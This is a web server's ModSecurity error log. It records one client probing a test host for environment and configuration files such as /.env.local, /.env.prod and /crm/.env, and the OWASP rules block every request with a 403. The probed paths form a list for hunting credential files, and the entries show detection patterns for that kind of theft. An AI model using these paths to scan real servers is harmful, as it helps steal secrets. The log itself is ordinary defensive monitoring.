[Wed Dec 10 17:36:57.009243 2025] [:error] [pid 651743] [client 45.148.10.247:44390] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTmhqUBgzzLxUZZ0YhB-FQAAAAY"]
[Wed Dec 10 17:36:57.009572 2025] [:error] [pid 651743] [client 45.148.10.247:44390] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTmhqUBgzzLxUZZ0YhB-FQAAAAY"]
[Wed Dec 10 17:36:57.009790 2025] [:error] [pid 651743] [client 45.148.10.247:44390] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTmhqUBgzzLxUZZ0YhB-FQAAAAY"]
[Wed Dec 10 17:36:57.061298 2025] [:error] [pid 651743] [client 45.148.10.247:44390] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTmhqUBgzzLxUZZ0YhB-FgAAAAY"]
[Wed Dec 10 17:36:57.061532 2025] [:error] [pid 651743] [client 45.148.10.247:44390] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTmhqUBgzzLxUZZ0YhB-FgAAAAY"]
[Wed Dec 10 17:36:57.061720 2025] [:error] [pid 651743] [client 45.148.10.247:44390] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTmhqUBgzzLxUZZ0YhB-FgAAAAY"]
[Wed Dec 10 17:36:57.087608 2025] [:error] [pid 651743] [client 45.148.10.247:44390] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTmhqUBgzzLxUZZ0YhB-FwAAAAY"]
[Wed Dec 10 17:36:57.087851 2025] [:error] [pid 651743] [client 45.148.10.247:44390] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTmhqUBgzzLxUZZ0YhB-FwAAAAY"]
[Wed Dec 10 17:36:57.088044 2025] [:error] [pid 651743] [client 45.148.10.247:44390] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTmhqUBgzzLxUZZ0YhB-FwAAAAY"]
[Wed Dec 10 17:36:59.459100 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aTmhq3CrB_7F9gmQG9FjQQAAAA0"]
[Wed Dec 10 17:36:59.459365 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aTmhq3CrB_7F9gmQG9FjQQAAAA0"]
[Wed Dec 10 17:36:59.459553 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aTmhq3CrB_7F9gmQG9FjQQAAAA0"]
[Wed Dec 10 17:36:59.651580 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTmhq3CrB_7F9gmQG9FjQwAAAA0"]
[Wed Dec 10 17:36:59.651719 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTmhq3CrB_7F9gmQG9FjQwAAAA0"]
[Wed Dec 10 17:36:59.651932 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTmhq3CrB_7F9gmQG9FjQwAAAA0"]
[Wed Dec 10 17:36:59.652117 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aTmhq3CrB_7F9gmQG9FjQwAAAA0"]
[Wed Dec 10 17:36:59.707158 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aTmhq3CrB_7F9gmQG9FjRAAAAA0"]
[Wed Dec 10 17:36:59.707423 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aTmhq3CrB_7F9gmQG9FjRAAAAA0"]
[Wed Dec 10 17:36:59.707643 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aTmhq3CrB_7F9gmQG9FjRAAAAA0"]
[Wed Dec 10 17:36:59.793254 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aTmhq3CrB_7F9gmQG9FjRgAAAA0"]
[Wed Dec 10 17:36:59.793504 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aTmhq3CrB_7F9gmQG9FjRgAAAA0"]
[Wed Dec 10 17:36:59.793682 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aTmhq3CrB_7F9gmQG9FjRgAAAA0"]
[Wed Dec 10 17:36:59.827981 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjRwAAAA0"]
[Wed Dec 10 17:36:59.828213 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjRwAAAA0"]
[Wed Dec 10 17:36:59.828396 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjRwAAAA0"]
[Wed Dec 10 17:36:59.866502 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjSAAAAA0"]
[Wed Dec 10 17:36:59.866747 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjSAAAAA0"]
[Wed Dec 10 17:36:59.866933 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjSAAAAA0"]
[Wed Dec 10 17:36:59.907833 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjSQAAAA0"]
[Wed Dec 10 17:36:59.908070 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjSQAAAA0"]
[Wed Dec 10 17:36:59.908270 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjSQAAAA0"]
[Wed Dec 10 17:36:59.938559 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjSgAAAA0"]
[Wed Dec 10 17:36:59.938922 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjSgAAAA0"]
[Wed Dec 10 17:36:59.939171 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aTmhq3CrB_7F9gmQG9FjSgAAAA0"]
[Wed Dec 10 17:37:00.092569 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aTmhrHCrB_7F9gmQG9FjSwAAAA0"]
[Wed Dec 10 17:37:00.092802 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aTmhrHCrB_7F9gmQG9FjSwAAAA0"]
[Wed Dec 10 17:37:00.093005 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aTmhrHCrB_7F9gmQG9FjSwAAAA0"]
[Wed Dec 10 17:37:00.124812 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aTmhrHCrB_7F9gmQG9FjTAAAAA0"]
[Wed Dec 10 17:37:00.125066 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aTmhrHCrB_7F9gmQG9FjTAAAAA0"]
[Wed Dec 10 17:37:00.125256 2025] [:error] [pid 651744] [client 45.148.10.247:34106] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aTmhrHCrB_7F9gmQG9FjTAAAAA0"]
